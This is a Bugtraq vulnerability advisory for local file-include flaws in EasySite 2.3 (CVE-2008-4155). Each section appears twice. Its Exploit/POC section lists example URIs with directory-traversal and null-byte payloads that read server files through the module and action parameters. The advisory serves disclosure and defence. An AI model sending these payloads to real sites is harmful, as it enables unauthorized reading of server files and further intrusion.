EasySite Multiple Local File Include Vulnerabilities
BID:30784
Info
EasySite Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 30784 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4155 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 21 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | SirGod |
| Vulnerable: |
EasyBrick EasySite 2.3 |
| Not Vulnerable: | |
Discussion
EasySite Multiple Local File Include Vulnerabilities
EasySite is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
EasySite 2.3 is vulnerable; other versions may also be affected.
EasySite is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
EasySite 2.3 is vulnerable; other versions may also be affected.
Exploit / POC
EasySite Multiple Local File Include Vulnerabilities
Attackers can exploit these issues with a web browser.
The following example URIs are available:
http://www.example.com/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
http://www.example.com/modules/Module/index.php?module=../../../../autoexec.bat%00
http://www.example.com/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
http://www.example.com/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
http://www.example.com/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
http://www.example.com/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
http://www.example.com/modules/Themes/index.php?module=../../../../autoexec.bat%00
http://www.example.com/www/index.php?module=../../../
http://www.example.com/inc/vmenu.php?module=../../../
Attackers can exploit these issues with a web browser.
The following example URIs are available:
http://www.example.com/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
http://www.example.com/modules/Module/index.php?module=../../../../autoexec.bat%00
http://www.example.com/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
http://www.example.com/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
http://www.example.com/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
http://www.example.com/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
http://www.example.com/modules/Themes/index.php?module=../../../../autoexec.bat%00
http://www.example.com/www/index.php?module=../../../
http://www.example.com/inc/vmenu.php?module=../../../
Solution / Fix
EasySite Multiple Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].